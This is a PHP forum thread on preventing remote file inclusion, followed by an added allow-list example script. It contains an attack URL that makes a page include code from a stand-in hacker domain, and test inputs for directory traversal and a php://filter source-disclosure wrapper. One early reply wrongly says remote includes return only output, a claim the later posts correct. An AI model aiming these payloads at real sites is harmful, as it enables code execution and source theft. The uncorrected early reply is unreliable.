jeff5656 Posted August 1, 2010

Would this work to prevent remote file inclusion vulnerability?

    $file = "../include/links.php";
    if ($file = '../include/links.php') {
        include $file;
    }

Link: https://forums.phpfreaks.com/topic/209503-preventing-remote-file-inclusion/
Alex Posted August 1, 2010

That would always be true, so it's pretty pointless. What exactly are you trying to prevent? No one can just include your PHP files and get the code, if that's what you're trying to prevent.
jeff5656 (Author) Posted August 1, 2010

Couldn't a hacker trick my page into including a file on their website by typing something like this into their browser?

    http://mydomain/index.php?file=http://hackersdomain/code.txt
Alex Posted August 1, 2010

No. When including the remote file all they will get is the output of the file, not the source code.
jeff5656 (Author) Posted August 1, 2010

Ok, that's good. But then why are all these sites out there warning about "remote file inclusion" vulnerabilities and talking about functions etc. to prevent it? In my code all I do is:

    include "file.php";

Are these includes not vulnerable?
PFMaBiSmAd Posted August 1, 2010

Yes, if you are including a file based on a GET parameter passed to your code, you must validate that the file name is just an allowed value (which will eliminate those cases where it is an actual URL of some raw PHP code on a hacker's site). Also, you must validate the file name in the context where it is being included (only allow the correct files to be included on any particular page). This is needed to prevent someone on your site from including, say, an administrative file on your site when they are only a guest on your site.

Edit: If you are including a literal file name, as in

    include "file.php";

then no, that is the only file that can possibly be included by that line of code.
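The allow-list plus per-page context check that PFMaBiSmAd describes, as an added example that is not code from this thread or from any poster. The page names (`index`, `admin`), include keys, file paths and the role ranking are all assumed for illustration; the sample requests are constructed, not real traffic. The script only prints which file would be included, so it runs without those include files existing.

```php
<?php
// Added example, not from the original thread. Demonstrates validating an
// include target taken from a GET parameter against an allow-list, scoped to
// the page it is used on and the caller's role. Names and paths are assumed.
declare(strict_types=1);

// The vulnerable pattern the thread is asking about. With allow_url_include
// enabled, ?file=http://hackersdomain/code.txt is fetched and executed as
// PHP; even without it, ?file=../include/admin/users.php pulls in a local
// file the caller should not reach. Shown for contrast only, never run here:
//
//     include $_GET['file'];

// Allowed includes per page context, each with the minimum role it requires.
// The array keys are the only values a request may supply (assumed layout).
function includeMap(): array
{
    $base = __DIR__ . '/include';
    return [
        'index' => [
            'links' => ['path' => "$base/links.php", 'role' => 'guest'],
            'news'  => ['path' => "$base/news.php",  'role' => 'guest'],
        ],
        'admin' => [
            'users' => ['path' => "$base/admin/users.php", 'role' => 'admin'],
        ],
    ];
}

const ROLE_RANK = ['guest' => 0, 'user' => 1, 'admin' => 2];

/**
 * Map a request value to a concrete file path, or return null to refuse.
 * The request value is used purely as a dictionary key and is never
 * concatenated into a path, so URLs, "../" sequences, null bytes and
 * php:// stream wrappers can never reach include().
 */
function resolveInclude(string $page, string $role, ?string $requested): ?string
{
    $map = includeMap();
    if ($requested === null || !isset($map[$page][$requested])) {
        return null;                       // unknown key on this page: refuse
    }
    $entry = $map[$page][$requested];
    if ((ROLE_RANK[$role] ?? -1) < ROLE_RANK[$entry['role']]) {
        return null;                       // right page, insufficient role
    }
    return $entry['path'];
}

// Constructed sample requests: [page, caller role, value of ?file=].
$requests = [
    ['index', 'guest', 'links'],
    ['index', 'guest', 'http://hackersdomain/code.txt'],
    ['index', 'guest', '../include/admin/users'],
    ['index', 'guest', 'php://filter/convert.base64-encode/resource=index'],
    ['index', 'guest', 'users'],   // a valid admin key, but not on this page
    ['admin', 'guest', 'users'],   // right page, caller is only a guest
    ['admin', 'admin', 'users'],
];

foreach ($requests as [$page, $role, $file]) {
    $target = resolveInclude($page, $role, $file);
    printf("%-6s %-6s %-52s -> %s\n", $page, $role, $file,
        $target === null ? 'REFUSED' : 'include ' . basename($target));
    // In the real page this would be:
    //   if ($target !== null) { include $target; } else { http_response_code(404); }
}
```

Only the first and last requests resolve to a file; everything else, including the remote URL from the question, the directory-traversal attempt, the `php://filter` wrapper, and the admin include requested from the wrong page or with the wrong role, is refused. Because the request value selects an entry rather than being spliced into a path, there is nothing for a remote URL to attach to, regardless of the `allow_url_include` setting.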